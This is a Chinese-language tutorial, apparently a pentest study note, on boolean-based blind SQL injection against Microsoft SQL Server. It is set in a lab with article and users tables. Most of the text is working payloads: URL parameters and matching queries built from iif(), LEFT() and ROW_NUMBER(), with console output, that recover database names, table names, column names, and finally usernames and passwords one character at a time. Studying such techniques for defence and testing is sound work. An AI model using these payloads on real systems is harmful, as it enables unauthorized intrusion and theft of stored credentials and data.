0x00 记忆方式

and iif(判断条件 ,1,0);

正确时会和原来的数据一致,错误会不返回数据

0x01 基本数据

  1. 1> select * from article;
  2. 2> go
  3. +----+-----------+-----------+
  4. | id | title       | content    |
  5. +----+-----------+-----------+
  6. |  1 | 测试标题  | 测试内容  |
  7. |  2 | 测试标题2 | 测试内容2 |
  8. +----+-----------+-----------+
  9. (2 rows affected)
  1. # 测试表数据: users;
  3. sql server> select * from users;
  4. +----+--------------+----------+
  5. | id | username     | password |
  6. +----+--------------+----------+
  7. |  1 | test-user-01 |  123456  | 
  8. |  2 | test-user-02 |  234567  |
  9. +----+--------------+----------+
  10. 2 rows in set (0.00 sec)
  1. sql server> SELECT system_user;
  2. +-----------------------+
  3. | field1                |
  4. +-----------------------+
  5. | sa                    |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)
  1. sql server> select db_name();
  2. +-----------------------+
  3. | field1                |
  4. +-----------------------+
  5. | test                  |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)

0x02 获取数据长度

  1. 1> select LEN(system_user);
  2. 2> go
  3. +---+
  4. |   |
  5. +---+
  6. | 2 |
  7. +---+
  8. (1 rows affected)

0x03 读取当前连接的数据库

web语句: http://www.test.com/sql.php?id=1 and 1=iif(LEFT(db_name(),1)=’t’,1,0)

数据库语句: select * from _article _where id =1 and 1=iif(LEFT(db_name(),1)=’t’,1,0)

  1. # 获取当前数据库第一个字符
  3. # 对得情况
  4. 1> select * from article where id=1 and 1=iif(LEFT(db_name(),1)='t',1,0);
  5. 2> go
  6. +----+----------+----------+
  7. | id | title      | content   |
  8. +----+----------+----------+
  9. |  1 | 测试标题 | 测试内容 |
  10. +----+----------+----------+
  11. (1 rows affected)
  15. # 错得情况
  16. 1> select * from article where id=1 and 1=iif(LEFT(db_name(),1)='aaaa',1,0);
  17. 2> go
  18. +----+-----+--------+
  19. | id | title | content |
  20. +----+-----+--------+
  21. +----+-----+--------+
  22. (0 rows affected)
  1. # 获取当前数据库第二个字符
  3. # 对得情况
  4. 1> select * from article where id=1 and 1=iif(LEFT(db_name(),2)='te',1,0);
  5. 2> go
  6. +----+----------+----------+
  7. | id | title      | content   |
  8. +----+----------+----------+
  9. |  1 | 测试标题 | 测试内容 |
  10. +----+----------+----------+
  11. (1 rows affected)

0x04 猜库名

注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库

web语句: http://www.test.com/sql.php?id=1 and 1=iif(LEFT(db_name(1),1)=’m’,1,0)

数据库语句: select * from article where id=1 and 1=iif(LEFT(db_name(1),1)=’m’,1,0)

  1. # 获取 1库第一个字符
  3. # 对得情况
  4. 1> select * from article where id=1 and 1=iif(LEFT(db_name(1),1)='m',1,0);
  5. 2> go
  6. +----+----------+----------+
  7. | id | title      | content   |
  8. +----+----------+----------+
  9. |  1 | 测试标题 | 测试内容 |
  10. +----+----------+----------+
  11. (1 rows affected)
  1. # 获取 1库第一个字符
  3. # 对得情况
  4. 1> select * from article where id=1 and 1=iif(LEFT(db_name(1),2)='ma',1,0)
  5. 2> go
  6. +----+----------+----------+
  7. | id | title      | content   |
  8. +----+----------+----------+
  9. |  1 | 测试标题 | 测试内容 |
  10. +----+----------+----------+
  11. (1 rows affected)

0x05 猜表名

注意:
OVER(Order by table_name) 里面的 table_name 要修改为 information_schema.tables 表里面存在的一个字段

修改 LEFT() 函数 第二个参数可以控制出来得数据

查询不同的库可以这样
例如:
table_catalog=db_name() (查询当前库)
table_catalog=’要查询的库名’

查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=1 and 1=iif(LEFT((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1),1)=’a’,1,0)

数据库语句: select * from article where id=1 and 1=iif(LEFT((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1),1)=’a’,1,0)

  1. # 获取 当前库 1表得第一个字符
  3. 1> SELECT
  4.     *
  5. FROM
  6.     article
  7. WHERE
  8.     id = 1
  9. AND 1 = iif (
  10.     LEFT (
  11.         (
  12.             SELECT
  13.                 table_name
  14.             FROM
  15.                 (
  16.                     SELECT
  17.                         ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  18.                         table_name
  19.                     FROM
  20.                         information_schema.tables
  21.                     WHERE
  22.                         table_catalog = db_name()
  23.                 ) AS a
  24.             WHERE
  25.                 row_number = 1
  26.         ),
  27.         1
  28.     ) = 'a',
  29.     1,
  30.     0
  31. );
  32. 2> go
  33. +----+----------+----------+
  34. | id | title      | content   |
  35. +----+----------+----------+
  36. |  1 | 测试标题 | 测试内容 |
  37. +----+----------+----------+
  38. (1 rows affected)
  1. # 获取 当前库 1表得第二个字符
  3. 1> SELECT
  4.     *
  5. FROM
  6.     article
  7. WHERE
  8.     id = 1
  9. AND 1 = iif (
  10.     LEFT (
  11.         (
  12.             SELECT
  13.                 table_name
  14.             FROM
  15.                 (
  16.                     SELECT
  17.                         ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  18.                         table_name
  19.                     FROM
  20.                         information_schema.tables
  21.                     WHERE
  22.                         table_catalog = db_name()
  23.                 ) AS a
  24.             WHERE
  25.                 row_number = 1
  26.         ),
  27.         2
  28.     ) = 'ar',
  29.     1,
  30.     0
  31. );
  32. 2> go
  33. +----+----------+----------+
  34. | id | title      | content   |
  35. +----+----------+----------+
  36. |  1 | 测试标题 | 测试内容 |
  37. +----+----------+----------+
  38. (1 rows affected)

0x06 猜字段

注意:
OVER(Order by column_name) 里面的 column_name 要修改为 information_schema.columns 表里面存在的一个字段

查询不同的表可以这样
例如:
table_name=’要查询的表名’

查询不同的字段可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=1 and 1=iif(LEFT((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1),1)=’i’,1,0)

数据库语句: select * from article where id=1 and 1=iif(LEFT((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1),1)=’i’,1,0)

  1. # 获取当前库 users表 第一个字段第一个字符
  3. 1> SELECT
  4.     *
  5. FROM
  6.     article
  7. WHERE
  8.     id = 1
  9. AND 1 = iif (
  10.     LEFT (
  11.         (
  12.             SELECT
  13.                 column_name
  14.             FROM
  15.                 (
  16.                     SELECT
  17.                         ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
  18.                         column_name
  19.                     FROM
  20.                         information_schema.columns
  21.                     WHERE
  22.                         table_catalog = db_name()
  23.                     AND table_name = 'users'
  24.                 ) AS a
  25.             WHERE
  26.                 row_number = 1
  27.         ),
  28.         1
  29.     ) = 'i',
  30.     1,
  31.     0
  32. );
  33. 2> go
  34. +----+----------+----------+
  35. | id | title      | content   |
  36. +----+----------+----------+
  37. |  1 | 测试标题 | 测试内容 |
  38. +----+----------+----------+
  39. (1 rows affected)
  1. # 获取当前库 users表 第一个字段第二个字符
  3. 1> SELECT
  4.     *
  5. FROM
  6.     article
  7. WHERE
  8.     id = 1
  9. AND 1 = iif (
  10.     LEFT (
  11.         (
  12.             SELECT
  13.                 column_name
  14.             FROM
  15.                 (
  16.                     SELECT
  17.                         ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
  18.                         column_name
  19.                     FROM
  20.                         information_schema.columns
  21.                     WHERE
  22.                         table_catalog = db_name()
  23.                     AND table_name = 'users'
  24.                 ) AS a
  25.             WHERE
  26.                 row_number = 1
  27.         ),
  28.         2
  29.     ) = 'id',
  30.     1,
  31.     0
  32. );
  33. 2> go
  34. +----+----------+----------+
  35. | id | title      | content   |
  36. +----+----------+----------+
  37. |  1 | 测试标题 | 测试内容 |
  38. +----+----------+----------+
  39. (1 rows affected)

0x07 猜内容

注意:
OVER(Order by username) 里面的 username 要修改为 users 表里面存在的一个字段

获取不同得字段数据可以修改 web语句里面得 a.username
例如
user表字段数据为:id, username,password
因为我使用了别名,所以如果想要获取其他得数据可以改成
a.id,a.username,a.password

查询不同的数据可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=1 and 1=iif(LEFT((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1),1)=’t’,1,0)

数据库语句: select from article where id=1 and 1=iif(LEFT((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number, from users) as a where row_number=1),1)=’t’,1,0)

  1. # 查询users表 第一条数据, username 字段 前9个字符
  3. 1> SELECT
  4.     *
  5. FROM
  6.     article
  7. WHERE
  8.     id = 1
  9. AND 1 = iif (
  10.     LEFT (
  11.         (
  12.             SELECT
  13.                 a.username
  14.             FROM
  15.                 (
  16.                     SELECT
  17.                         ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
  18.                     FROM
  19.                         users
  20.                 ) AS a
  21.             WHERE
  22.                 row_number = 1
  23.         ),
  24.         9
  25.     ) = 'test-user',
  26.     1,
  27.     0
  28. );
  29. 2> go
  30. +----+----------+----------+
  31. | id | title      | content   |
  32. +----+----------+----------+
  33. |  1 | 测试标题 | 测试内容 |
  34. +----+----------+----------+
  35. (1 rows affected)
  1. # 查询users表 第二条数据, password 字段 前6个字符
  3. 1> SELECT
  4.     *
  5. FROM
  6.     article
  7. WHERE
  8.     id = 1
  9. AND 1 = iif (
  10.     LEFT (
  11.         (
  12.             SELECT
  13.                 a.password
  14.             FROM
  15.                 (
  16.                     SELECT
  17.                         ROW_NUMBER () OVER (ORDER BY password) AS row_number ,*
  18.                     FROM
  19.                         users
  20.                 ) AS a
  21.             WHERE
  22.                 row_number = 2
  23.         ),
  24.         6
  25.     ) = '234567',
  26.     1,
  27.     0
  28. );
  29. 2> go
  30. +----+----------+----------+
  31. | id | title      | content   |
  32. +----+----------+----------+
  33. |  1 | 测试标题 | 测试内容 |
  34. +----+----------+----------+
  35. (1 rows affected)